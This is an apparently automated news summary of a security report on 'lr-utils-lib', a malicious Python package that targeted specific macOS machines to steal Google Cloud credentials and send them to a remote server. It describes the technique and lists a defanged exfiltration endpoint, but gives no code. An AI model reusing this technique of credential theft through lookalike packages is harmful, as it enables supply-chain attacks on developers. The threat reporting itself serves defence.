July 27, 2024 at 02:00AM
Cybersecurity researchers found a malicious package “lr-utils-lib” on the Python Package Index, targeting specific Apple macOS systems to steal Google Cloud credentials. It checks for macOS, compares UUID against hardcoded hashes, and harvests Google Cloud data. The captured info is sent to a remote server. Social engineering tactics suggest a targeted attack.
After reviewing the meeting notes, the key takeaways are:
– Cybersecurity researchers discovered a malicious package named “lr-utils-lib” on the Python Package Index that targeted Apple macOS systems to steal users’ Google Cloud credentials.
– The package had a narrow pool of victims, with only 59 downloads before it was taken down in early June 2024.
– The malware used predefined hashes to target specific macOS machines, attempting to harvest Google Cloud authentication data and transmitting it to a remote server.
– An important aspect of the package is its initial check for installation on a macOS system and comparison of a hard-coded list of UUID hashes before further actions.
– The captured information was transmitted over HTTP to a remote server “europe-west2-workload-422915[.]cloudfunctions[.]net.”
– A fake LinkedIn profile named “Lucid Zenith” matching the package’s owner was found, suggesting a possible social engineering element to the attack.
– The attack indicates that threat actors have prior knowledge of the macOS systems they want to infiltrate and employ tactics to distribute lookalike packages.
The implications of these attacks are significant, especially for enterprises, as the initial compromise usually occurs on an individual developer’s machine, but the impact on enterprises can be substantial. This highlights the importance of vigilance and security measures to protect against such targeted attacks.